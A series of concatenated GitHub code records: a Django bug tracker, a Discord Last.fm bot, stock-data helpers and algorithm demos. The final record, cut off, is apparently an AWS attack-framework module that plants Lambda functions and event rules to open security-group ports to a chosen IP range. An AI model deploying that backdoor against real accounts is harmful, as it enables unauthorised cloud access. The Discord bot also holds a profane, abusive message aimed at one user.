coinbasettr.CoinbaseTTRParser(csv_content=f)\n parser = coinbasettr.CoinbaseTTRParser(filename=self.filename)\n parser.cleanup()\n\n def test_loading_sample(self):\n with open(self.filename) as f:\n parser = coinbasettr.CoinbaseTTRParser(f)\n txs = [i for i in parser]\n for tx in txs:\n self.assertEqual(tx.source, \"coinbase\")\n self.assertEqual(len(txs), 8)\n buys = [i for i in txs if i.operation == transaction.Operation.BUY]\n sales = [i for i in txs if i.operation == transaction.Operation.SELL]\n self.assertEqual(len(buys), 7)\n self.assertEqual(len(sales), 1)\n","repo_name":"robertkarl/yabc","sub_path":"tests/formats/test_coinbasettr.py","file_name":"test_coinbasettr.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"35348302572","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef func_h(x0, x1, tau):\n if(min(tau) < 0 or max(tau) > 20):\n print('tau has to be in [0,20] but is ', tau)\n return 0\n return 1 / (1 + x0 * tau + (x1 * tau) * (x1 * tau))\n\n\ndef fitness(vector):\n x0 = vector[0]\n x1 = vector[1]\n tau = np.linspace(0, 20, 20)\n w = [1, 1, 1]\n value = 0\n gam1 = gamma1(x0, x1, tau)\n gam2 = gamma2(x0, x1, tau)\n gam3 = gamma3(x0, x1, tau)\n value += sum(gam1[gam1>0]*gam1[gam1>0])\n value += sum(gam2[gam2>0]*gam2[gam2>0])\n value += sum(gam3[gam3>0]*gam3[gam3>0])\n return value\n\ndef gamma1(x0, x1, tau):\n t = tau[tau < 10]\n return (func_h(x0, x1, t) - 1.04)\n # im buch ist es so rum:\n # return (1.04 - func_h(x0, x1, t))\n\ndef gamma2(x0, x1, tau):\n t = tau[tau >= 10]\n return (func_h(x0, x1, t) - 0.4)\n\ndef gamma3(x0, x1, tau):\n t = tau[tau <= 5]\n return (0.8 - func_h(x0, x1, t))\n\n","repo_name":"ferdkuh/nia-2017","sub_path":"de/constrained_problem.py","file_name":"constrained_problem.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5657586362","text":"# -*-coding:Latin-1 -*\nimport pandas as pd\nfrom relation_extract import ERE\n\n\ndef read_write():\n \"\"\"\n read texts from the dataset and write result into submission file\n \"\"\"\n df = pd.read_csv('data/icdm_contest_data.csv', encoding='utf_8_sig')\n result_list = []\n for i in range(len(df['content'])):\n ERE1 = ERE(df['content'][i])\n for ere in ERE1:\n result_dict = {}\n result_dict['industry'] = df['industry'][i]\n result_dict['index'] = df['index'][i]\n result_dict['s1'] = ere[0]\n result_dict['r'] = ere[1]\n result_dict['s2'] = ere[2]\n result_list.append(result_dict)\n\n df2 = pd.DataFrame(result_list, columns=['industry', 'index', 's1', 'r', 's2'])\n df2.to_csv('data/best_now2.csv', encoding='utf_8_sig', index=False)\n\n\nif __name__ == '__main__':\n read_write()\n","repo_name":"brsmsg/ICDM2019-KG-Contest","sub_path":"read_csv.py","file_name":"read_csv.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"10471960065","text":"from django.shortcuts import render, reverse, HttpResponseRedirect\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.decorators import login_required\n\nfrom bug_app.models import Ticket, MyUser\nfrom bug_app.forms import TicketForm, LoginForm, SignUpForm, EditTicketForm\nfrom bug_project import settings\n\n# Create your views here.\n\ndef index(request):\n new_tickets = Ticket.objects.filter(status=\"New\")\n tickets_in_progress = Ticket.objects.filter(status=\"In Progress\")\n invalid_tickets = Ticket.objects.filter(status=\"Invalid\")\n done_tickets = Ticket.objects.filter(status=\"Done\")\n return render(\n request, 'index.htm',\n {\n 'new_tickets': new_tickets, \n 'tickets_in_progress': tickets_in_progress, \n 'invalid_tickets': invalid_tickets, \n 'done_tickets': done_tickets\n })\n\ndef loginview(request):\n if request.method == \"POST\":\n form = LoginForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n user = authenticate(request, username=data['username'], password=data['password']\n )\n if user:\n login(request, user)\n return HttpResponseRedirect(\n request.GET.get('next', reverse('homepage'))\n )\n form = LoginForm()\n return render(request, 'generic_form.htm', {'form':form})\n\ndef logoutview(request):\n logout(request)\n return HttpResponseRedirect(reverse('homepage'))\n\n@login_required\ndef ticket_edit(request, id):\n file = Ticket.objects.get(id=id)\n if request.method == \"POST\":\n form = EditTicketForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n file.title = data['title']\n file.description = data['description']\n file.status = data['status']\n file.assigned = data['assigned']\n file.completed = data['completed']\n file.save()\n return HttpResponseRedirect(reverse('ticket_detail', args=(id,)))\n\n form = EditTicketForm(initial={\n 'title': file.title,\n 'description': file.description,\n })\n return render(request, \"generic_form.htm\", {'form': form})\n\ndef signupview(request):\n if request.method == \"POST\":\n form = SignUpForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n user = MyUser.objects.create_user(\n username=data['username'],\n password=data['password'],\n )\n return HttpResponseRedirect(reverse('homepage'))\n \n form = SignUpForm()\n return render(request, 'generic_form.htm', {'form':form})\n\n@login_required\ndef add_ticket(request):\n html = \"generic_form.htm\"\n if request.method == \"POST\":\n form = TicketForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n Ticket.objects.create(\n title=data['title'],\n description=data['description'],\n filer = request.user\n )\n return HttpResponseRedirect(reverse('homepage'))\n \n form = TicketForm()\n return render(request, html, {\"form\": form})\n\ndef user_view(request, id):\n user = MyUser.objects.get(id=id)\n filed = Ticket.objects.filter(filer=user)\n assigned_user = Ticket.objects.filter(assigned=user)\n completed_user = Ticket.objects.filter(completed=user)\n return render(request,'userpage.htm', \n {'user': user, \n 'filed': filed, \n 'assigned_user': assigned_user, \n 'completed_user': completed_user })\n\n\ndef ticket_detail_view(request, id):\n ticket = Ticket.objects.get(id=id)\n return render(request, 'ticket_detail.htm', {'ticket': ticket})\n@login_required\ndef assigning_ticket_view(request, id):\n ticket = Ticket.objects.get(id=id)\n ticket.status = 'In Progress'\n ticket.assigned = request.user\n ticket.completed = None\n ticket.save()\n return HttpResponseRedirect(reverse('ticket_detail.htm', args=(id,)))\n\n@login_required\ndef completed_ticket_view(request, id):\n ticket = Ticket.objects.get(id=id)\n ticket.status = 'Done'\n ticket.assigned = None\n ticket.completed = request.user\n ticket.save()\n return HttpResponseRedirect(reverse('ticket_detail.htm', args=(id,)))\n\n@login_required\ndef invalid_ticket_view(request, id):\n ticket = Ticket.objects.get(id=id)\n ticket.status = 'Invalid'\n ticket.assigned = None\n ticket.completed = None\n ticket.save()\n return HttpResponseRedirect(reverse('ticket_detail.htm', args=(id,)))","repo_name":"HyperionCG/Bug-Tracker","sub_path":"bug_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36317622682","text":"class Listy(object):\n def __init__(self, a):\n self.a = a\n\n def elemen_at(self, i):\n if i >= len(self.a) or i < 0:\n return -1\n else:\n return self.a[i]\n\n def __str__(self):\n return str(self.a)\n\n def get_len(self):\n if self.elemen_at(0) == -1:\n return 0\n i = 1\n while self.elemen_at(i) != -1:\n i *= 2\n # backtrack\n while self.elemen_at(i) == -1:\n i -= 1\n\n return i + 1\n\nl = Listy([1, 4, 5, 8, 12])\nprint(l)\nprint(l.elemen_at(3))\nprint(l.get_len())","repo_name":"nderkach/algorithmic-challenges","sub_path":"listy.py","file_name":"listy.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11732007092","text":"#!/usr/bin/env python3\n\"\"\"Lastfm cog\n\nCommunicate with lastfm API to display now playing, number of artist\nscrobbles, top artists, and a number of other features.\n\"\"\"\nimport colorific\nimport discord\nimport json\nimport math\nimport requests\nimport sys\nimport urllib.request\nfrom data import permissions_data, lastfm_data\nfrom discord.ext import commands\n\nAPI_KEY, API_SECRET = open(\"cogs/api.txt\", \"r\").readlines()\nCOOLDOWN = 420\n\n\ndef get_user_url(user):\n \"\"\"Return hypothetical url of a lastfm username\"\"\"\n url = ((\"http://ws.audioscrobbler.com/2.0/\" +\n \"?method=user.getInfo\" +\n \"&user={}\" +\n \"&api_key={}\" +\n \"&format=json\").format(user, API_KEY))\n\n return url\n\n\ndef get_page_url(method, user, page, results_per_page=1000):\n \"\"\"Return url needed for API request\n\n Given a user and an API method, return the url of the page displaying\n the method's results for that user. For user-only methods.\n \"\"\"\n url = ((\"http://ws.audioscrobbler.com/2.0/\" +\n \"?method={}\" +\n \"&user={}\" +\n \"&api_key={}\" +\n \"&limit={}\" +\n \"&page={}\" +\n \"&format=json\").format(method, user, API_KEY,\n results_per_page, page))\n\n return url\n\n\ndef get_page_url_alt(method, user, artist, page, results_per_page=200):\n \"\"\"Same as above, but for artist-dependent methods\"\"\"\n url = ((\"http://ws.audioscrobbler.com/2.0/\" +\n \"?method={}\" +\n \"&user={}\" +\n \"&artist={}\" +\n \"&api_key={}\" +\n \"&limit={}\" +\n \"&page={}\" +\n \"&format=json\").format(method, user, artist,\n API_KEY, results_per_page, page))\n\n return url\n\n\ndef is_username(user):\n \"\"\"Return whether a username is valid on lastfm\"\"\"\n user_url = get_user_url(user)\n request = requests.get(user_url)\n\n if request.status_code == 200:\n content = request.text\n parsed_content = json.loads(content)\n\n try:\n error = parsed_content['error']\n return False\n except KeyError as err:\n return True\n\n return False\n\n\ndef make_recent_tracks_list(parsed_content):\n \"\"\"Given a parsed json page, make a list of recent tracks\"\"\"\n recent_tracks = parsed_content['recenttracks']['track']\n recent_tracks_list = list()\n\n for track in recent_tracks:\n name = track['name']\n artist = track['artist']['#text']\n album = track['album']['#text']\n image = track['image'][3]['#text']\n recent_tracks_list.append((name, artist, album, image))\n\n return recent_tracks_list\n\n\ndef get_last_played(user):\n \"\"\"Get a user's last played track\"\"\"\n method = \"user.getRecentTracks\"\n page_url = get_page_url(method, user, 1, results_per_page=1)\n request = requests.get(page_url)\n\n if request.status_code == 200:\n content = request.text\n parsed_content = json.loads(content)\n\n error = None\n try:\n error = parsed_content['error']\n except KeyError as err:\n pass\n\n if error is None:\n recent_tracks_list = make_recent_tracks_list(parsed_content)\n last_played_track = recent_tracks_list[0]\n return last_played_track\n\n return None\n\n\ndef find_playcount(artist_name, parsed_content):\n \"\"\"Find an artist's playcount within a parsed top artists page\"\"\"\n top_artists = parsed_content['topartists']['artist']\n\n for artist in top_artists:\n if artist_name.lower() == artist['name'].lower():\n return artist['playcount']\n\n return None\n\n\ndef get_num_scrobbles_of_artist(user, artist):\n \"\"\"Find number of times user has scrobbled an artist\"\"\"\n method = \"user.getTopArtists\"\n num_scrobbles = 0\n\n page = 1\n page_url = get_page_url(method, user, page)\n request = requests.get(page_url)\n\n while request.status_code == 200:\n content = request.text\n parsed_content = json.loads(content)\n\n error = None\n try:\n error = parsed_content['error']\n except KeyError as err:\n pass\n\n if error is None:\n num_scrobbles = find_playcount(artist, parsed_content)\n if num_scrobbles:\n return num_scrobbles\n elif len(parsed_content['topartists']['artist']) == 1000:\n page += 1\n page_url = get_page_url(method, user, page)\n request = requests.get(page_url)\n else:\n break\n\n return 0\n\n\ndef make_top_artist_dict(parsed_content):\n \"\"\"Given a parsed json page, make a dict of top artists\"\"\"\n top_artists = parsed_content['topartists']['artist']\n top_artists_dict = dict()\n\n for artist in top_artists:\n name = artist['name']\n playcount = int(artist['playcount'])\n top_artists_dict[name] = playcount\n\n return top_artists_dict\n\n\ndef get_top_artists(user):\n \"\"\"Find a user's most scrobbled artists\"\"\"\n method = \"user.getTopArtists\"\n top_artist_dict = dict()\n\n page = 1\n page_url = get_page_url(method, user, page)\n request = requests.get(page_url)\n\n while request.status_code == 200:\n content = request.text\n parsed_content = json.loads(content)\n\n error = None\n try:\n error = parsed_content['error']\n except KeyError as err:\n pass\n\n if error is None:\n top_artist_dict = {**top_artist_dict,\n **make_top_artist_dict(parsed_content)}\n if len(parsed_content['topartists']['artist']) == 1000:\n page += 1\n page_url = get_page_url(method, user, page)\n request = requests.get(page_url)\n else:\n return top_artist_dict\n\n return None\n \n\ndef get_primary_color(image_url):\n \"\"\"Get the primary color of the currently playing album\"\"\"\n try:\n urllib.request.urlretrieve(image_url, \"album_art.jpg\")\n except:\n return int(\"0xffffff\", 0)\n\n palette = colorific.extract_colors(\"album_art.jpg\")\n primary_color_rgb = palette.colors[0].value\n primary_color = \"0x\" + colorific.rgb_to_hex(primary_color_rgb)[1:]\n\n return int(primary_color, 0)\n \n\ndef user_is_me(ctx):\n return ctx.message.author.id == \"359613794843885569\"\n\n\nclass LastfmCog:\n \"\"\"Cog class\"\"\"\n\n def __init__(self, bot):\n \"\"\"Constructor for cog class\n\n Takes as input a Bot object.\n \"\"\"\n self.bot = bot\n\n # Dictionaries to keep track of commands to show top artists, since\n # these commands are sensitive to reactions.\n self.top_artist_msgs = {}\n\n @commands.group(pass_context=True, aliases=[\"fm\"])\n async def lastfm(self, ctx):\n \"\"\"Display last played, number of artist scrobbles, and top artists\"\"\"\n channel_id = ctx.message.channel.id\n author_id = ctx.message.author.id\n\n bad_permissions = \"Sorry, you cannot use that command here.\"\n bad_username = (\"Please set a lastfm username in <#245685218055290881> first, \"\n \"using .fm set username.\")\n bad_last_played = \"I could not find your last played song.\"\n\n # Invokes any subcommand given.\n subcommand = ctx.invoked_subcommand\n if subcommand:\n return\n\n # Bad channel permissions.\n if channel_id not in permissions_data.get_allowed_channels(\"lastfm\"):\n await self.bot.say(bad_permissions)\n return\n\n user = lastfm_data.get_user(author_id)\n if user is None:\n await self.bot.say(bad_username)\n return\n\n last_played = get_last_played(user)\n if last_played is None:\n await self.bot.say(bad_last_played)\n return\n \n if ctx.message.channel.id == \"243129311421399050\":\n await commands.Command.invoke(self.embed_last_played, ctx)\n else:\n await commands.Command.invoke(self.embed_last_played_no_cooldown, ctx)\n\n @commands.command(pass_context=True)\n @commands.cooldown(1, COOLDOWN, commands.BucketType.user)\n async def embed_last_played(self, ctx):\n \"\"\"Create an embed from last played data\"\"\"\n author = ctx.message.author\n author_id = author.id\n avatar_url = author.avatar_url\n\n user = lastfm_data.get_user(author_id)\n last_played = get_last_played(user)\n\n name, artist, album, image_url = last_played\n if album == '':\n album = '\\u200b'\n\n user_search_url = \"https://www.last.fm/user/{}\".format(user)\n\n color = get_primary_color(image_url)\n\n embed = discord.Embed(colour=color, description=name)\n embed.add_field(name=artist, value=album)\n\n embed.set_author(name=user, icon_url=avatar_url, url=user_search_url)\n embed.set_thumbnail(url=image_url)\n\n await self.bot.say(embed=embed)\n\n @commands.command(pass_context=True)\n async def embed_last_played_no_cooldown(self, ctx):\n \"\"\"Create an embed from last played data\"\"\"\n author = ctx.message.author\n author_id = author.id\n avatar_url = author.avatar_url\n\n user = lastfm_data.get_user(author_id)\n last_played = get_last_played(user)\n\n name, artist, album, image_url = last_played\n if album == '':\n album = '\\u200b'\n\n user_search_url = \"https://www.last.fm/user/{}\".format(user)\n\n color = get_primary_color(image_url)\n\n embed = discord.Embed(colour=color, description=name)\n embed.add_field(name=artist, value=album)\n\n embed.set_author(name=user, icon_url=avatar_url, url=user_search_url)\n embed.set_thumbnail(url=image_url)\n\n await self.bot.say(embed=embed)\n\n @lastfm.command(pass_context=True)\n async def set(self, ctx, user):\n \"\"\"Add a user's lastfm username to table\"\"\"\n channel_id = ctx.message.channel.id\n author_id = ctx.message.author.id\n\n bad_permissions = \"Sorry, you cannot use that command here.\"\n bad_username = \"That is not a valid lastfm username.\"\n\n channels = permissions_data.get_allowed_channels(\"lastfm set\")\n if channel_id not in channels:\n await self.bot.say(bad_permissions)\n return\n\n if not is_username(user):\n await self.bot.say(bad_username)\n return\n\n lastfm_data.add_user(author_id, user)\n await self.bot.say(\"Username successfully set!\")\n\n @lastfm.command(pass_context=True)\n async def scrobbles(self, ctx, *args):\n \"\"\"Display the number of times a user has scrobbled an artist\"\"\"\n artist = \"\"\n for word in args:\n artist += word + \" \"\n artist = artist[:-1]\n\n channel_id = ctx.message.channel.id\n author_id = ctx.message.author.id\n author_name = ctx.message.author.name\n\n bad_permissions = \"Sorry, you cannot use that command here.\"\n bad_username = \"Please set a lastfm username first.\"\n\n channels = permissions_data.get_allowed_channels(\"lastfm scrobbles\")\n if channel_id not in channels:\n await self.bot.say(bad_permissions)\n return\n\n user = lastfm_data.get_user(author_id)\n if not user:\n await self.bot.say(bad_username)\n return\n\n num_scrobbles = get_num_scrobbles_of_artist(user, artist)\n await self.bot.say(author_name + \" has scrobbled \" + artist + \" \" +\n str(num_scrobbles) + \" times.\")\n\n @embed_last_played.error\n async def embed_last_played_error(self, error, ctx):\n \"\"\"Display any error messages produced by embed\"\"\"\n author_id = ctx.message.author.id\n voice_id = \"245685218055290881\"\n if(isinstance(error, commands.CommandOnCooldown) and\n ctx.message.server.id == \"243129311421399050\"):\n if ctx.message.author.id != \"387046431262769153\":\n mins = int(error.retry_after / 60)\n secs = int(error.retry_after % 60)\n cooldown_msg = (\"<@\" + author_id + \">. Hi, sweetie! Mommy here, \" +\n \"saying you need to take it easy on the fms! Try waiting \" +\n \"another {}m, {}s for me, how about that? :heart:\")\n await self.bot.send_message(self.bot.get_channel(voice_id),\n cooldown_msg.format(mins, secs))\n else:\n cooldown_msg = (\"Are you fucking kidding me. Is 'frawg' supposed to be a fun name \" +\n \"or is it an accurate representation of your intelligence level? How. \" +\n \"many. fucking. times. do i Have to haul my fucking ass to send you this \" +\n \"message when you could have just fucking WAITED. FUCK FUCK FUCK\")\n await self.bot.send_message(ctx.message.channel, cooldown_msg)\n elif ctx.message.server.id == \"243129311421399050\":\n await self.bot.say(\"Unknown error occurred.\")\n\n\ndef setup(bot):\n \"\"\"Attach the lastfm cog to a bot\"\"\"\n cog = LastfmCog(bot)\n bot.add_cog(cog)\n","repo_name":"spiegel421/musicord-bot","sub_path":"cogs/lastfm_cog.py","file_name":"lastfm_cog.py","file_ext":"py","file_size_in_byte":13240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"9265024369","text":"#! /user/bin/env python\n# -*- coding=utf-8 -*-\n\nimport os\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom quotations.constants import CACHE_PATH\nfrom quant_backend.util.hdf5Function import hdf5\nfrom quant_backend.util.cache import cache\nfrom quant_backend.models import engine\nfrom quotations.constants import INDEXS\nfrom quotations.manager.logManager import simulation_logger\nfrom quant_backend.util.utils import f14\nfrom quotations.manager.redisManager import RedisManager\nredisManager=RedisManager('data_10')\n\n\n\nclass DataCollection:\n \"\"\"\n 数据采集模块\n \"\"\"\n def __init__(self):\n self.Hdf = hdf5(os.path.join(CACHE_PATH, 'hanqing.h5'))\n self.mysql_Hdf = hdf5(os.path.join(CACHE_PATH, 'quota.h5'))\n self.suspned_Hdf = hdf5(os.path.join(CACHE_PATH, 'suspend.h5'))\n self.redis = redisManager\n\n def get_limit_move(self,stock:str):\n \"\"\"\n 得到涨跌停情况,当前价小于等于跌停价就是跌停,大于等于涨停价就是涨停,都是就是正常,异常返回值是2,不能买卖\n 涨停是1,不能卖,跌停是-1,不能卖\n :param stock:查询个股\n :return:\n \"\"\"\n try:\n stock = f14(stock)\n result = self.redis.hmget('stkRealTimeState:{}_14901'.format(stock),['high','nMatch','low'])\n if float(result[1]) >= float(result[0]):\n return 1,round(float(result[1]),2)\n elif float(result[1]) <= float(result[2]):\n return -1,round(float(result[1]),2)\n else:\n return 0,round(float(result[1]),2)\n except:\n return 2,'获取行情失败:{},无法买卖'.format('stkRealTimeState:{}_14901'.format(f14(stock)))\n\n def get_status_price(self,stock:str):\n \"\"\"\n 得到是否停牌和最新股价\n :return:\n \"\"\"\n try:\n stock = f14(stock)\n result = self.redis.hmget('stkRealTimeState:{}_14901'.format(stock),['stockStatus','nMatch'])\n if result[0] == '0':\n return True,round(float(result[1]),2)\n else:\n return False,round(float(result[1]),2)\n except:\n return False,None\n\n def close(self):\n self.Hdf.close()\n self.mysql_Hdf.close()\n self.suspned_Hdf.close()\n\n def xbar(self, stock, day=None, type=0):\n stock = stock[0:6]\n df = cache.get('hq_{}'.format(stock))\n if df is None or len(df) == 0:\n df = self.Hdf.select('/df_{}'.format(stock))\n cache.add('hq_{}'.format(stock), df)\n\n if df is not None:\n if type == 0:\n try:\n close, ltm = df.loc[day]\n return [{'day': day, 'close': round(close,2), 'ltm':ltm}]\n except Exception as e:\n simulation_logger.info('miss:{}:{}:{}'.format(e, stock, day))\n return []\n else:\n df = df[df.index <= day]\n if not df.empty:\n close = df['close'].values[-1]\n ltm = df['ltm'].values[-1]\n day = df.index[-1]\n return [{'day': day, 'close': round(close,2), 'ltm':ltm}]\n else:\n return []\n else:\n return []\n\n def find_suspendeds(self, day):\n # 停牌股\n day = '/suspend_' + str(day).replace('-', '')\n df = self.suspned_Hdf.select(day)\n if df is not None:\n return list(df['code'])\n else:\n return []\n\n def find_pinds(self, day):\n # 涨跌停股\n df = cache.get('find_pinds')\n if df is None or len(df) == 0:\n df = pd.read_sql('select * from pind', engine)\n cache.add('find_pinds', df)\n return list(df[(df['date'] == day) & (df['status'] == 1)]['code'])\n\n def find_stock_codes(self):\n df = cache.get('find_stock_codes')\n if df is not None and len(df) > 0:\n return df\n else:\n df = pd.read_sql('select code from basic', engine)\n stocks = list(df['code'])\n cache.add('find_stock_codes', stocks)\n return stocks\n\n def find_st(self, date):\n '''获取st'''\n df = cache.get('find_st')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code, entry_dt, remove_dt from st', engine)\n df[['entry_dt', 'remove_dt']] = df[[\n 'entry_dt', 'remove_dt']].astype(str)\n cache.add('find_st', df)\n return list(df[(df['entry_dt'] <= date) & (\n df['remove_dt'] >= date)]['code'])\n\n def find_second_new(self, date):\n '''获取次新股票'''\n df = cache.get('find_second_new')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code,list_date,delist_date from basic', engine)\n df[['list_date', 'delist_date']] = df[[\n 'list_date', 'delist_date']].astype(str)\n cache.add('find_second_new', df)\n return list(df[df['list_date'] > str(datetime.strptime(\n date, '%Y-%m-%d').date() - timedelta(days=365))]['code'])\n\n def find_regionals_code(self, date, region=None):\n '''获取地域股票'''\n df = cache.get('find_regionals_code')\n if df is None or len(df) == 0:\n df = pd.read_sql('select code, region from regionals', engine)\n cache.add('find_regionals_code', df)\n if region:\n return list(df[df['region'].isin(region)]['code'])\n return list(df['code'])\n\n def find_margin_code(self, date):\n '''筛选融资融券股票'''\n df = cache.get('find_margin_code')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code, date from margintrade WHERE date = \"{}\"'.format(date),\n engine)\n df[['date']] = df[['date']].astype(str)\n return list(df[df['date'] == date]['code'])\n\n def find_conseption(self, date, industry=None):\n '''筛选股票股票,时间+行业'''\n df = cache.get('find_conseption')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select gn_code as category, code, list_date, delist_date from conseption', engine)\n df[['list_date', 'delist_date']] = df[[\n 'list_date', 'delist_date']].astype(str)\n cache.add('find_conseption', df)\n return list(df[(df['category'].isin(industry)) & (\n df['list_date'] <= date) & (df['delist_date'] > date)]['code'])\n\n def find_index_code(self, date, index):\n '''获取指数成份股,可能为in数据'''\n category = [INDEXS.get(str(i), i) for i in index]\n df = cache.get('find_index_code')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code, category, list_date, delist_date from indexs', engine)\n df[['list_date', 'delist_date']] = df[[\n 'list_date', 'delist_date']].astype(str)\n cache.add('find_index_code', df)\n return list(df[(df['category'].isin(category)) & (\n df['list_date'] <= date) & (df['delist_date'] > date)]['code'])\n\n def find_industry_code(self, date, index):\n '''获取行业成份股'''\n df = cache.get('find_industry_code')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code, industry_code, hy_code, start_date, end_date from industry',\n engine)\n df[['start_date', 'end_date']] = df[[\n 'start_date', 'end_date']].astype(str)\n cache.add('find_industry_code', df)\n return list(df[(df['hy_code'].isin(index)) & (\n df['start_date'] <= date) & (df['end_date'] > date)]['code'])\n\n def find_all_code(self, date):\n '''获取所有股票'''\n df = cache.get('find_all_code')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select code, list_date, delist_date from basic', engine)\n df[['list_date', 'delist_date']] = df[[\n 'list_date', 'delist_date']].astype(str)\n cache.add('find_all_code', df)\n return list(df[(df['list_date'] <= str(date)) &\n (df['delist_date'] > date)]['code'])\n\n def find_ah_connection(self, date):\n df = cache.get('find_ah_connection')\n if df is None or len(df) == 0:\n df = pd.read_sql(\n 'select sse_code from hh_stock_connection', engine)\n cache.add('find_ah_connection', df)\n return list(df['sse_code'])\n\n def benchmark_history(self, code, date, end_date):\n if not date:\n timing = pd.read_sql(\n \"select code, date, befor_day, niubear, ups, open, close from timing as t where code='{}' ORDER BY date DESC limit 1\".format(\n code), engine)\n else:\n timing = pd.read_sql(\n \"select code, date, befor_day, niubear, ups, open, close from timing where code='{}' and date>='{}' and date<='{}' order by date\".format(\n code,\n date,\n end_date),\n engine)\n timing.index = pd.to_datetime(timing['date'])\n timing['date'] = timing['date'].astype(str)\n timing['befor_day'] = timing['befor_day'].astype(str)\n return timing\n","repo_name":"likeweilikewei/Distributed-quantitative-automatic-trading-framework","sub_path":"quant_backend/rocket/data_collection/data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":9520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"31116970237","text":"from tkinter import *\r\nroot = Tk()\r\nroot.geometry(\"500x550\")\r\nroot.title('Shift-OR Sequential Search')\r\n\r\n\r\ndef to_bin(n, width=32):\r\n \"Pad a binary number to WIDTH bits wide\"\r\n s = bin(n).replace(\"0b\", \"\")\r\n return ((\"%0\" + str(width) + \"d\") % int(s))\r\ndef neg(x):\r\n #0b11111111111111111111111111111111 - x\r\n return 0b11111111111111111111111111111111 - x\r\ndef shift_or():\r\n trace = True\r\n text=variable1.get()\r\n pattern= variable2.get()\r\n \"\"\"Same as shift_and, but invert masks and use OR to \r\n avoid an | in the inner loop.\"\"\"\r\n m = len(pattern)\r\n n = len(text)\r\n neg0 = neg(0)\r\n # build table\r\n B = {} # char -> bitmask table\r\n for i in range(m):\r\n B[pattern[i]] = (B.get(pattern[i], 0) | (1 << i))\r\n B = {k: neg(B[k]) for k in B}\r\n # complement all bit masks in B, complement bit mask\r\n a = neg0\r\n hit = (1 << (m - 1))\r\n listNodes = Listbox(root, width=80, height=35)\r\n listNodes.grid(column=0, row=12)\r\n notf=0\r\n for i in range(n):\r\n a = (((a << 1) & neg0) | B.get(text[i], neg0))\r\n if trace:\r\n listNodes.insert(END, \" %s & B[%c] : %s\" % (to_bin(a), text[i], to_bin(B.get(text[i], neg0))))\r\n #print(\"%s & B[%c] : %s\" % (to_bin(a), text[i], to_bin(B.get(text[i], neg0))))\r\n\r\n\r\n if a & hit == 0:\r\n listNodes.insert(END,\"\\nPattern Found at %d\" % (i - m + 2))\r\n notf=1\r\n\r\n\r\n if notf == 0 :\r\n listNodes.insert(END, \"\\n Pattern Not Found \")\r\n\r\n\r\nvar = IntVar()\r\nvariable1=StringVar()\r\nvariable2=StringVar()# Value saved here variable2=StringVar() # Value saved here\r\nLabel(root, text = \"Shift-OR Sequential Search: \",background='skyblue' ,foreground='black').grid(row=4, column=3)\r\nLabel(root, text = \"Enter Text:\").grid(row=7, column=2)\r\nEntry(root, width=30,textvariable = variable1).grid(row=7, column=3)\r\nLabel(root, text = \"Enter Pattern: \").grid(row=9, column=2)\r\nEntry(root, width=30,textvariable = variable2).grid(row=9, column=3)\r\nButton(root, text = \"Show Results\", command= shift_or).grid(row=11, column=3)\r\nroot.config(bg=\"skyblue\")\r\nroot.mainloop()\r\n\r\n#place(y=25, x=130)","repo_name":"Jatan88/IR-Assignments","sub_path":"assi_10.py","file_name":"assi_10.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41840547766","text":"#!/usr/bin/env python3\nimport datetime\n\nimport argparse\nfrom botocore.exceptions import ClientError\nfrom copy import deepcopy\nimport subprocess\nimport random\nimport string\nimport os\n\ndef main(args, awsattack_main):\n session = awsattack_main.get_active_session()\n\n args = parser.parse_args(args)\n print = awsattack_main.print\n get_regions = awsattack_main.get_regions\n\n data = {'functions_created': 0, 'rules_created': 0, 'successes': 0}\n\n created_resources = {'LambdaFunctions': [], 'CWERules': []}\n\n if not args.regions:\n regions = get_regions('Lambda')\n else:\n regions = args.regions.split(',')\n\n from_port, to_port = args.port_range.split('-')\n\n target_role_arn = args.target_role_arn\n\n # Import the Lambda function and modify the variables it needs\n with open('./modules/{}/lambda_function.py.bak'.format(technique_info['name']), 'r') as f:\n code = f.read()\n\n code = code.replace('FROM_PORT', from_port).replace('TO_PORT', to_port).replace('IP_RANGE', args.ip_range).replace('IP_PROTOCOL', args.protocol)\n\n with open('./modules/{}/lambda_function.py'.format(technique_info['name']), 'w+') as f:\n f.write(code)\n\n # Zip the Lambda function\n try:\n print(' Zipping the Lambda function...\\n')\n subprocess.run('cd ./modules/{}/ && rm -f lambda_function.zip && zip lambda_function.zip lambda_function.py && cd ../../'.format(technique_info['name']), shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n except Exception as error:\n print('Failed to zip the Lambda function locally: {}\\n'.format(error))\n return data\n\n with 